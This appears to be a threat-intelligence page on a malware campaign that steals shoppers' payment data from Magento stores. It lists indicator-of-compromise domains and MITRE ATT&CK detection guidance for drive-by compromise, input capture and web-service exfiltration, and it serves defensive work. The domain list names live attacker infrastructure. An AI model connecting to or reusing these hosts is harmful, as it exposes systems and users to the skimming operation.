Campaigns
Digital Pickpockets: Inside the Massive Malware Campaign Targeting Magento

Digital Pickpockets: Inside the Massive Malware Campaign Targeting Magento

MalwareCampaignMagentoPlatformEcommerceSecurityPaymentDataTheftAdobeMagento
A newly detected malware campaign is targeting several online stores that utilize Magento, a widely-used e-commerce platform.Researchers have uncovered a new malware campaign that is secretly stealing payment information from online shoppers across numerous e-commerce sites that operate on Adobe's Magento platform.

Indicators of Compromise

luckipath.shop
statistall.com
analytlx.shop
statlstic.shop
statmaster.shop
vodog.shop
codcraft.shop
deslgnpro.shop
happywave.shop
codemingle.shop
artvislon.shop
trendset.website
datawiz.shop
pixelsmith.shop
salesguru.online

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION REF

T1189-Drive-by Compromise


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.

DS0022

File

File Creation

Monitor for newly constructed files written to disk to gain access to a system through a user visiting a website over the normal course of browsing.

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data.



Network Traffic Content

Monitor for other unusual network traffic that may indicate additional tools transferred to the system. Use network intrusion detection systems, sometimes with SSL/TLS inspection, to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.

DS0009

Process

Process Creation

Look for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, or evidence of Discovery.


T1056-Input Capture


ID

Data Source

Data Component

Detects

DS0027

Driver

Driver Load

Monitor for unusual kernel driver installation activity

DS0022

File

File Modification

Monitor for changes made to files for unexpected modifications to access permissions and attributes

DS0009

Process

OS API Execution

Monitor for API calls to SetWindowsHook, GetKeyState, and GetAsyncKeyState [7]



Process Creation

Monitor for newly executed processes conducting malicious activity



Process Metadata

Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow.

DS0024

Windows Registry

Windows Registry Key Modification

Monitor for changes made to windows registry keys or values for unexpected modifications


T1567-Exfiltration Over Web Service (T1567)


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

Review logs for SaaS services, including Office 365 and Google Workspace, to detect the configuration of new webhooks or other features that could be abused to exfiltrate data.

DS0017

Command

Command Execution

Monitor executed commands and arguments that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

DS0022

File

File Access

Monitor for files being accessed by an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed network connections to web and cloud services associated with abnormal or non-browser processes.



Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).



Network Traffic Flow

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.


Observed Countries5

AU (2)
GB (159)
IN (219)
NL (960)
US (136)